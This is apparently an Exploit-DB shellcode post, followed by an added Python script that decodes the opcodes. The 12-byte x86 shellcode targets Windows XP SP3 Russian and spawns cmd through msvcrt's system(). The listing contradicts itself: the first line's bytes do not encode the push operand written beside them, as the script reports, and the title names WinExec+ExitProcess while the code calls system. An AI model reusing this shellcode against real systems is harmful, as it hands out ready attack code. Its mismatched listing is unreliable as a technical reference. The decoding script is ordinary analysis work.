win32/xp sp3 (Ru) WinExec+ExitProcess cmd shellcode 12 bytes

EDB-ID: 13647 | CVE: N/A | OSVDB-ID: N/A
Author: lord Kelvin | Published: 2010-03-24
68 9D 61 F9 77  push 0x77C01345
B8 C7 93 C1 77  mov eax,msvcrt.system
FF D0           call eax
 
In msvcrt.dll, at 0x77C01344, we have the string ".cmd"; that's the trick.
The pushed address 0x77C01345 is one byte past it, so system() receives "cmd".
The code works on WinXP SP3 Pro Rus; on other versions you need to find
the string and the system(char*) address yourself.
 
Coded via lord Kelvin.
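
An added example, not part of the original post: a Python check that decodes the opcode bytes of the listing above and compares each encoded immediate with the operand written beside it, which is how an analyst confirms what a hex listing pushes and which values are absolute addresses tied to one DLL build. The names `decode` and `audit` are this example's own.

```python
import re
import struct

# The three listing lines exactly as they appear on this page.
LISTING = """\
68 9D 61 F9 77  push 0x77C01345
B8 C7 93 C1 77  mov eax,msvcrt.system
FF D0           call eax
"""

def decode(insn: bytes):
    """Decode the three opcode forms used by the listing (x86, 32-bit)."""
    if len(insn) == 5 and insn[0] == 0x68:        # push imm32
        return "push", struct.unpack("<I", insn[1:])[0]
    if len(insn) == 5 and insn[0] == 0xB8:        # mov eax, imm32
        return "mov eax", struct.unpack("<I", insn[1:])[0]
    if insn == b"\xff\xd0":                       # call eax
        return "call eax", None
    raise ValueError("opcode not handled: " + insn.hex())

def audit(listing: str):
    """Return one dict per line: encoded operand vs. operand in the text."""
    rows = []
    for line in listing.splitlines():
        m = re.match(r"((?:[0-9A-Fa-f]{2} )+)\s*(.+)", line)
        raw = bytes.fromhex(m.group(1))
        op, imm = decode(raw)
        lit = re.search(r"0x([0-9A-Fa-f]{8})", m.group(2))
        stated = int(lit.group(1), 16) if lit else None
        rows.append({
            "op": op, "size": len(raw), "imm": imm, "stated": stated,
            # A literal operand in the text must equal the encoded one.
            "consistent": stated is None or stated == imm,
            # Absolute imm32: valid only for one DLL build and load address.
            "hardcoded": imm is not None,
        })
    return rows

if __name__ == "__main__":
    for r in audit(LISTING):
        imm = "-" if r["imm"] is None else f"0x{r['imm']:08X}"
        print(f"{r['op']:8} imm={imm} consistent={r['consistent']}")
```

Run against the listing as printed, the check reports that the bytes of the first line encode a different immediate than the `push` operand written next to them, so the hex column and the mnemonic column should not be assumed to agree.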